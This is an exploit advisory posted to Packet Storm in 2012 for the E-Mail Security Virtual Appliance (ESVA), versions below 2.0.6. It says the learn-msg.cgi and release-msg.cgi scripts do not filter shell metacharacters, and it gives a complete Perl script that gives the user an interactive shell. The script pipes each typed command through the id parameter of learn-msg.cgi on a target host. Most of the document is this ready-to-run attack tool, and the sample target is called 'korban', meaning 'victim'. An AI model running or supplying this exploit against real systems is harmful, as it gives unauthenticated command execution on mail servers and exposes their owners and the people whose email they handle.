E-Mail Security Virtual Appliance (EVSA) Remote Command Execution

2012-08-17T00:00:00
ID PACKETSTORM:115625
Type packetstorm
Reporter iJoo
Modified 2012-08-17T00:00:00

Description

                                        
                                            `# Exploit Title: E-Mail Security Virtual Appliance (ESVA) Remote Execution.  
# Date: 10 Aug 2012  
# Exploit Author: iJoo  
# Vendor Homepage: http://www.esvacommunity.com/  
# Software Link: http://sourceforge.net/projects/esva-project/  
# Version: < 2.0.6  
  
ESVA (E-Mail Security Virtual Appliance) is a pre-built and semi-configured email scanning appliance that will run on VMware Workstation, Server, Player or ESX Server.  
  
-=+ Infected Files  
  
..../cgi-bin/learn-msg.cgi  
..../cgi-bin/release-msg.cgi  
  
Not found any strips/filter to metacharacters..  
Attacker can easily execute command..  
  
-=+ Simple RCE ESVA  
  
#! /usr/bin/perl  
use LWP;  
use HTTP::Request;  
if (@ARGV < 1)  
{  
print "\n==========================================\n";  
print " ESVA - REMOTE EXECUTION SCRIPT \n";  
print "==========================================\n";  
print "Usage: perl esva.pl host (without http://)\n";  
print "Ex. perl esva.pl www.korban.com\n";  
exit;  
}  
$host=$ARGV[0];  
print "Try to Execution Command!\n";  
print "iDSc-shell# ";  
chomp( $cmd = <STDIN>);  
while($cmd !~ "exit")  
{  
$content = "";  
$ua = LWP::UserAgent->new();  
$ua->agent('');  
$request = HTTP::Request->new (GET => "http://".$host."/cgi-bin/learn-msg.cgi?id=%7c".$cmd."%3b");  
$response = $ua->request ($request);  
$content = $response->content;  
print $content."\n";  
print "iDSc-shell# ";  
chomp( $cmd = <STDIN>);  
}  
  
-=+ Thanks to  
My lovely Country NKRI INDONESIA!!  
binh4x staff - www.binushacker.net // Forum.binushacker.net  
  
`